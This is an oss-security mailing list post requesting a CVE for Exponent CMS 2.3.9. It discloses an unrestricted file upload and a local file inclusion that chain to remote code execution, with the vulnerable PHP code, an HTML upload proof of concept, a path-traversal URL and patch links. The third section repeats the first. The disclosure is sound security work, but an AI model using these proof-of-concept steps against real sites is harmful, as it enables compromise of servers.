Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 21 Sep 2016 10:08:21 +0800
From: "DM_" <contact@...ay.me>
To: "oss-security" <oss-security@...ts.openwall.com>
Subject: CVE request:Exponent CMS 2.3.9 Unrestricted File Upload RCE and Local File include vulnerability

Hi,


This is YongXiao Ma of Silence's PKAV Team. I reported some security issues to ExponentCMS some days ago. 


# Test environment
exponent version: latest 2.3.9
php: 5.5.x
server: apache 2.2.x


# Details


1. Unrestricted File Upload
there is a unrestricted file upload issue at framework/modules/forms/controllers/formsController.php and the upload file is located at /tmp/, where php script can be executed.


although we dont know file name, but we can brute it simply, such as time() + "_" + upload name.


    public function import_csv_mapper() {
        //Check to make sure the user filled out the required input.
        if (!is_numeric($this->params["rowstart"])) {
            unset($this->params["rowstart"]);
            $this->params['_formError'] = gt('The starting row must be a number.');
            expSession::set("last_POST", $this->params);
            header("Location: " . $_SERVER['HTTP_REFERER']);
            exit('Redirecting...');
        }


        if (!empty($this->params['forms_id'])) {
            // if we are importing to an existing form, jump to that step
            $this->import_csv_data_mapper();
        } else {
            //Get the temp directory to put the uploaded file
            $directory = "tmp";


            //Get the file save it to the temp directory
            if ($_FILES["upload"]["error"] == UPLOAD_ERR_OK) {
                //	$file = file::update("upload",$directory,null,time()."_".$_FILES['upload']['name']);
                $file = expFile::fileUpload("upload", false, false, time() . "_" . $_FILES['upload']['name'], $directory.'/'); //FIXME quick hack to remove file model
	....


POC: 


	<!DOCTYPE html>
	<html>
	<form action="http://localhost/exponent-2.3.9/index.php?controller=forms&action=import_csv_mapper&forms_id=1&rowstart=0" method="POST" enctype ="multipart/form-data">
	<input type="file" name="upload">	
	<input type="submit" name="submit">


	</form>
	</html>


2. LFI


then LFI comes, at exponent-2.3.9/install/popup.php.


    <?php
    $page = (isset($_REQUEST['page']) ? expString::sanitize($_REQUEST['page']) : '');
    if (is_readable('popups/' . $page . '.php')) {
        include('popups/' . $page . '.php');
    }
    ?>


so we can upload a php file, then include it to make a RCE again.


POC: 
	http://127.0.0.1/exponent-2.3.9/install/popup.php?page=../../files/test




3. Unrestricted File Upload and RCE


there is a unrestricted file upload issue at framework/modules/forms/controllers/formsController.php and the upload file is located at /tmp/, where php script can be executed.


although we dont know file name, but we can brute it simply, such as time() + "_" + name.


    public function import_csv_mapper() {
        //Check to make sure the user filled out the required input.
        if (!is_numeric($this->params["rowstart"])) {
            unset($this->params["rowstart"]);
            $this->params['_formError'] = gt('The starting row must be a number.');
            expSession::set("last_POST", $this->params);
            header("Location: " . $_SERVER['HTTP_REFERER']);
            exit('Redirecting...');
        }


        if (!empty($this->params['forms_id'])) {
            // if we are importing to an existing form, jump to that step
            $this->import_csv_data_mapper();
        } else {
            //Get the temp directory to put the uploaded file
            $directory = "tmp";


            //Get the file save it to the temp directory
            if ($_FILES["upload"]["error"] == UPLOAD_ERR_OK) {
                //	$file = file::update("upload",$directory,null,time()."_".$_FILES['upload']['name']);
                $file = expFile::fileUpload("upload", false, false, time() . "_" . $_FILES['upload']['name'], $directory.'/'); //FIXME quick hack to remove file model
	....


POC: 


	<!DOCTYPE html>
	<html>
	<form action="http://localhost/exponent-2.3.9/index.php?controller=forms&action=import_csv_mapper&forms_id=1&rowstart=0" method="POST" enctype ="multipart/form-data">
	<input type="file" name="upload">	
	<input type="submit" name="submit">


	</form>
	</html>






# Patches


https://exponentcms.lighthouseapp.com/projects/61783/changesets/355702a9835cf527796c9d469a82258b7639148a
https://exponentcms.lighthouseapp.com/projects/61783/changesets/628ea61834d92611644a1dfc1ba24216ee647c59

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.